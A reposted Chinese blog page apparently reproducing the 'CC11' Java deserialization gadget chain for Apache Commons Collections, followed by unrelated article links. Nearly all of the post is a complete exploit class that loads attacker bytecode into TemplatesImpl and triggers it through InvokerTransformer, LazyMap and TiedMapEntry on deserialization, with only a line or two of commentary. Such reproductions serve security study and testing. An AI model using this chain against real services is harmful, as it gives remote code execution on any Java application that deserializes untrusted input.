java 反序列化 cc11 复现

news/2025/1/15 21:22:13/文章来源:https://www.cnblogs.com/meraklbz/p/18673730

cc11就是对我们调试过的cc3中出口为LazyMap并且没有绕过InvokerTransformer的版本进行修改,使其不出现非javase中的数组.换句话说就是绕过了ChainedTransformer
直接来看exp

package org.example;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;import java.io.*;import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.ExceptionPredicate;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.keyvalue.TiedMapEntry;import java.lang.reflect.*;
import java.util.HashMap;
import java.util.Map;public class Main {public static void main(String[] args) throws Exception{TemplatesImpl templatesimpl = new TemplatesImpl();Class<?> clazz = templatesimpl.getClass();Field field = clazz.getDeclaredField("_name");field.setAccessible(true);field.set(templatesimpl, "test");Field field2 = clazz.getDeclaredField("_bytecodes");field2.setAccessible(true);byte[] code = Files.readAllBytes(Paths.get("F:\\idea_workspace\\cc3\\target\\classes\\org\\example\\test.class"));byte[][] codes = {code};field2.set(templatesimpl, codes);Field field3 = clazz.getDeclaredField("_tfactory");field3.setAccessible(true);field3.set(templatesimpl, new TransformerFactoryImpl());InvokerTransformer it = new InvokerTransformer("newTransformer", null, null);Map lazymap = LazyMap.decorate(new HashMap(), it);//此处进行修改TiedMapEntry tiedMapEntry = new TiedMapEntry(LazyMap.decorate(new HashMap(), new ConstantTransformer(null)), templatesimpl);//此处进行修改HashMap<Object, Object> hashMap = new HashMap<>();hashMap.put(tiedMapEntry, null);Class clazz1 = TiedMapEntry.class;Field field1 = clazz1.getDeclaredField("map");field1.setAccessible(true);field1.set(tiedMapEntry, lazymap);serial(hashMap);unserial();}public static void serial(Object obj) throws Exception {ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream("./cc1.bin"));out.writeObject(obj);}public static void unserial() throws Exception {ObjectInputStream in = new ObjectInputStream(new FileInputStream("./cc1.bin"));in.readObject();}
}

看了一下,和网上的版本不太一样.利用链和cc3一样,没啥可说的.

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/869785.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

JS-39 Math 对象

JS-39 Math 对象

Math是JavaScript的原生对象,提供各种数学功能。 Math.abs() 1、Math.abs方法返回参数值的绝对值 Math.abs(1)//1 Math.abs(-1)//1 2、Math.max(),Math.min() Math.max方法返回参数之中最大的那个值,Math.min返回最小的那个值。如果参数为空,Math.min返回Infinity,Math.max返…
阅读更多...
单独变量操作数据库使用@Param

单独变量操作数据库使用@Param

@Param// 单独变量传递过去的时候需要和数据库字段进行对照,哪怕命名相同也需要@Param@Update("update admingoin set admingoinpict = #{admingoinpict} where admingoinuid = #{admingoinuid}")void aaaaa(@Param("admingoinuid")String admingoinui…
阅读更多...
2025.1.14——1200

2025.1.14——1200

2025.1.14——1200Q1. 1200 You have \(n\) sticks, numbered from \(1\) to \(n\). The length of the \(i\)-th stick is \(2^{a_i}\). You want to choose exactly \(3\) sticks out of the given \(n\) sticks, and form a non-degenerate triangle out of them, using the…
阅读更多...
【前端】前端需要知道的缓存知识总结

【前端】前端需要知道的缓存知识总结

引言📇 HTTP缓存是一种用于提高网站性能和减少带宽使用的技术。当用户访问一个网页时,浏览器会下载页面上的所有资源(如HTML、CSS、JavaScript等),这些资源会占用大量的带宽和时间。为了减少这些资源的加载时间,HTTP缓存机制被引入。 缓存分为强缓存和协商缓存两种,强缓…
阅读更多...
[CF2057G] Secret Message 题解

[CF2057G] Secret Message 题解

神秘题目。 题目的条件十分神奇,\(|A| \le \frac{1}{5} (s+p)\),不知所云。 一开始尝试用皮克定理转化,但是 failed。 阅读理解之后发现有一个(很典)的套路,就是构造出五组方案,使得 \(\sum_{cyc} |A| = s+p\),这样就一定有一组方案,面积小于等于 $ \frac{1}{5} (s+p)…
阅读更多...
装机重启后无法进入图形界面

装机重启后无法进入图形界面

装机重启后无法进入图形界面 A problem has occurred and the system cant recover. Please log out and try again. 主要原因可能是安装的软件包未更新,更新即可 (yum update) 报错截图首先进入命令行界面并登录root账户 Ctrl+Alt+F2联网 对于rocky系统,查看网络设备: nmcl…
阅读更多...
【MATLAB】自学记录之基于某楼栋房价数据绘制三维网格图

【MATLAB】自学记录之基于某楼栋房价数据绘制三维网格图

1. 前言 基于某小区某一楼栋各个户型及楼层之间对应的出售价格表,通过MATLAB脚本进行读取解析,并绘制成三维网格图,从而能够直观地以可视化的角度观察户型位置(东边户、西边户、中间连廊户)、楼层位置(高中低楼层)等因素是否与出售价格存在一定的影响关系。2. 预置条件序…
阅读更多...
【前端】谈谈水印实现的几种方式

【前端】谈谈水印实现的几种方式

遇到问题 日常工作中,经常会遇到很多敏感的数据,为防止数据的泄露,我们要在数据上做一些”包装“。目的就是让那些有心泄露数据的”不法分子“迫于严重的”舆论压力“而放弃不法行为,使之”犯罪未遂“,达到不战而屈人之兵的效果。而在安全部门工作的我们,数据安全的观念早…
阅读更多...
插头DP记录

插头DP记录

关于插头dp。AAA黑题批发。 这个东西好像设问还挺广泛的,做到哪写到哪吧。 得先了解一下轮廓线dp定义。 概念 设问广泛但是总体来说是连通性相关状压dp的一类设计方法。 骨牌覆盖问题 比如说,最简单的,问你 \(n*m\) 的棋盘格里能放多少 \(1*2\) 的骨牌。 考虑把一个节点分为…
阅读更多...
03_LaTeX之文档元素

03_LaTeX之文档元素

在知道了如何输入文字后,在本章了解一个结构化的文档所依赖的各种元素——章节、目录、列表、图表、交叉引用、脚注等等。目录03_\(\LaTeX{}\) 之文档元素章节和目录章节标题目录文档结构的划分标题页交叉引用脚注和边注特殊环境列表对齐环境引用环境摘要环境代码环境表格列格…
阅读更多...
THREE.js学习笔记6——Geometries

THREE.js学习笔记6——Geometries

这一小节学习THREE.js中的物理模型。 什么是geometry?(英文解释,翻译为中文就看不懂了,直接看英语吧)Composed of vertices (point coordinates in 3D spaces)and faces (triangles that join those vertices to create a surface) Can be used for meshes but also for par…
阅读更多...
第三节 回归实战

第三节 回归实战

数据处理超参:人为指定不能改变测试数据只有x没有标签y 训练数据拆分,82开,作训练集和验证集(验证模型好坏),模型训练不是一路上升的过程,训练几次验证一次,最好的模型save下来 one-hot独热编码 猪(1 0 0) 狗(0 1 0) 猫(0 0 1) def get_feature_importance(feature_data, label…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023